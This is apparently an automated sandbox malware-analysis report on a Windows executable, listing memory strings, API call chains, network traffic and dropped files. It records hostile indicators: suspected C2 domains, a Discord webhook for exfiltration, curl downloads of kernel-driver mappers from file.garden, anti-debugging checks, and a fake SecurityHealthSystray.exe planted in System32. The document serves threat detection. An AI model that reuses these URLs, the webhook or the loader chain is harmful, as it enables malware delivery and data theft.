                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: powershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                Source: powershell.exe, 00000020.00000002.1969358434.00000251FE250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                Source: powershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001F.00000002.1759033398.000001D6A04A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: seoI30IZZr.exeString found in binary or memory: http://www.houseindustries.com/license
                                Source: seoI30IZZr.exeString found in binary or memory: http://www.houseindustries.com/licenseBurbank
                                Source: seoI30IZZr.exeString found in binary or memory: http://www.houseindustries.com/licenseCopyright
                                Source: seoI30IZZr.exeString found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
                                Source: powershell.exe, 00000020.00000002.1965574807.00000251FDFE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                                Source: msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top
                                Source: msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/
                                Source: msedge.exe, 00000033.00000002.1974383608.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
                                Source: powershell.exe, 0000001F.00000002.1759033398.000001D6A0281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1757221368.00000251E5DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: seoI30IZZr.exeString found in binary or memory: https://auth.gg/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=engli
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                                Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                                Source: powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: seoI30IZZr.exeString found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
                                Source: curl.exe, 00000004.00000002.1492818711.0000019B0A2A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1492818711.0000019B0A2A7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1492267172.0000019B0A2DC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1492314570.0000019B0A2DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
                                Source: curl.exe, 00000004.00000002.1492818711.0000019B0A2A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
                                Source: curl.exe, 00000004.00000002.1492818711.0000019B0A2AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binbth.dll
                                Source: curl.exe, 00000007.00000002.1509267564.000001B321110000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509387760.000001B321126000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1509003906.000001B321125000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509487975.000001B32114A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.1509267564.000001B321118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
                                Source: curl.exe, 00000007.00000002.1509267564.000001B321110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
                                Source: powershell.exe, 00000020.00000002.1757221368.00000251E6018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                Source: powershell.exe, 0000001F.00000002.1911610338.000001D6B02F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1888230589.00000251F5E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/i
                                Source: RegAsm.exe, 0000000C.00000002.1538668307.0000000001304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000132A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900%
                                Source: RegAsm.exe, 0000000C.00000002.1538668307.0000000001304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900S
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strappystyio.shop/api=
                                Source: RegAsm.exe, 0000000C.00000002.1538540291.00000000012DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surveriysiop.shop/api
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                Source: RegAsm.exe, 0000000C.00000002.1538876694.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F2CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF7865F2CE0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F2CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF7865F2CE0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F2A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,0_2_00007FF7865F2A90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,12_2_00438E3C
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78661DD90 pow,pow,sqrt,memchr,memchr,memchr,memchr,memchr,memchr,memchr,memchr,SendInput,GetAsyncKeyState,_invalid_parameter_noinfo_noreturn,0_2_00007FF78661DD90
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866236B0 PeekMessageA,TranslateMessage,DispatchMessageA,GetForegroundWindow,GetWindow,SetWindowPos,GetClientRect,ClientToScreen,GetCursorPos,GetAsyncKeyState,SetWindowPos,GetClientRect,QueryPerformanceCounter,GetKeyState,GetKeyState,GetKeyState,ClientToScreen,SetCursorPos,GetActiveWindow,GetCursorPos,ScreenToClient,GetAsyncKeyState,rand,GetAsyncKeyState,free,DestroyWindow,_invalid_parameter_noinfo_noreturn,0_2_00007FF7866236B0

                                System Summary

                                barindex
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614760
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614BD0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786623ED0: CreateThread,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,system,system,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,MessageBoxA,system,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,DeviceIoControl,MessageBoxA,exit,CloseHandle,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,DefWindowProcA,LoadIconA,LoadCursorA,LoadIconA,GetDesktopWindow,GetWindowRect,RegisterClassExA,CreateWindowExA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,SetWindowPos,SetLayeredWindowAttributes,UpdateWindow,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,0_2_00007FF786623ED0
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866147600_2_00007FF786614760
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786623ED00_2_00007FF786623ED0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614BD00_2_00007FF786614BD0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866143000_2_00007FF786614300
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662C2E00_2_00007FF78662C2E0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662272A0_2_00007FF78662272A
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866177300_2_00007FF786617730
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866227330_2_00007FF786622733
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662271B0_2_00007FF78662271B
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865FA8000_2_00007FF7865FA800
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F97A00_2_00007FF7865F97A0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865EB8750_2_00007FF7865EB875
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865FA0400_2_00007FF7865FA040
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78660F0400_2_00007FF78660F040
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F48200_2_00007FF7865F4820
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662C1100_2_00007FF78662C110
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865FF8F00_2_00007FF7865FF8F0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78661DD900_2_00007FF78661DD90
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786610D800_2_00007FF786610D80
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F85700_2_00007FF7865F8570
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865FC5500_2_00007FF7865FC550
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F5DF00_2_00007FF7865F5DF0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866065D00_2_00007FF7866065D0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662268B0_2_00007FF78662268B
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866076800_2_00007FF786607680
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865EE6800_2_00007FF7865EE680
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F0E800_2_00007FF7865F0E80
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866016900_2_00007FF786601690
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662267F0_2_00007FF78662267F
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226670_2_00007FF786622667
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226730_2_00007FF786622673
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662265B0_2_00007FF78662265B
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662264F0_2_00007FF78662264F
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786602E500_2_00007FF786602E50
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226430_2_00007FF786622643
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662270C0_2_00007FF78662270C
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786612F100_2_00007FF786612F10
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226FD0_2_00007FF7866226FD
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226EE0_2_00007FF7866226EE
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78661A6E00_2_00007FF78661A6E0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226DF0_2_00007FF7866226DF
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226D00_2_00007FF7866226D0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F6ED00_2_00007FF7865F6ED0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226C10_2_00007FF7866226C1
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866236B00_2_00007FF7866236B0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866226AF0_2_00007FF7866226AF
